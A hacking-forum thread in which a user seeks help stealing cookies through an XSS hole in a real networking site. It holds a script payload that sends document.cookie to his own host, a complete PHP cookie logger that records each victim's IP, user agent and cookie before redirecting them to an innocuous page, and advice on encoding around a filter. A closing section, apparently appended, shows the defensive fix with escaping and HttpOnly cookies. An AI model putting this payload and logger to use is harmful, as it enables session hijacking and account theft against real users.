
One-Click XSS Cookie Logger


ghost

Okay, so.

I've found an XSS vulnerability in a high-profile networking site. The URL looks something like this:

"http://doesntconcernyou.com/youdontneedtoknow.php?safdasdf=sadfas&blank="

An injection such as the following after the "blank" variable works: `<script>window.location="http://www.goatse.cz";</script>`

However, I don't merely want to send people to goatse. I'd like to grab their cookies. So when I attempt to craft a URL to send them to my logging hub, like so:

`<script>window.location="http://mysite.com/victimsite/oneclick/index.php?c00kie="+document.cookie;</script>`

The injection does not work. Any idea as to what I could be doing wrong? Here's the source to the logger:

```php
<?php
// Collect details about the request that hit this page
$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$cookie = stripslashes( $_GET['c00kie'] );

// One record per request, fields separated by newlines
$string = $ip . "\n" . $user_agent . "\n" . $referer . "\n" . $cookie;

// Append the record to log.txt
$fp = fopen('log.txt', 'a');
fwrite($fp, $string . "\n\n");
fclose($fp);

// Send the visitor on to an unremarkable page
header("Location: http://victimsite.com/nonsuspiciouslookingpage");

?>
```

spyware (Banned)

Does the "+" get filtered maybe?


ghost

Hm, perhaps. Let me try encoding it.


ghost

Aha! That kinda works. I'm getting a part of the cookie.


spyware (Banned)

lesserlightsofheaven wrote: Aha! That kinda works. I'm getting a part of the cookie.

What part are you NOT getting?


ghost

All the juicy bits, sadly =P.

One part of the cookie contains the IP, another the location, and the next two are long hashed values.

All I get is the IP.
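From the defender's side, an added example that is not code from this thread: the unescaped reflection that lets the `<script>` payload above run, beside its hardened form, plus the session cookie flag that keeps `document.cookie` from exposing a session id at all. The parameter name `blank` and the logger URL come from the thread; the output context and the cookie settings are assumptions.

```php
<?php
// Added example, not code from this thread. Assumes the vulnerable page echoes
// the "blank" query parameter into its HTML body unescaped, which is what the
// thread's working <script> payload implies.

// Vulnerable pattern: the parameter is written into the page as-is, so any
// <script> in ?blank= is parsed as markup and runs in the visitor's browser.
function render_vulnerable(string $blank): string
{
    return '<p>You searched for: ' . $blank . '</p>';
}

// Hardened: encode for HTML before output. <, >, &, " and ' become entities,
// so the browser renders the payload as text instead of executing it.
function render_hardened(string $blank): string
{
    $safe = htmlspecialchars($blank, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p>You searched for: ' . $safe . '</p>';
}

// Defence in depth (assumed settings): HttpOnly keeps the session cookie out
// of document.cookie, so even a script that does run cannot read the "long
// hashed values" the thread is after; Secure and SameSite limit where the
// cookie is sent. Call this before any output is written.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Constructed input: the exfiltration payload quoted in the thread.
$payload = '<script>window.location="http://mysite.com/victimsite/oneclick/index.php?c00kie="+document.cookie;</script>';

echo render_vulnerable($payload), PHP_EOL; // script tag emitted verbatim
echo render_hardened($payload), PHP_EOL;   // &lt;script&gt;... shown as inert text
```

Output encoding closes the injection point; HttpOnly means a second, unrelated XSS bug on the same site still cannot hand a session id to a logger like the one posted above.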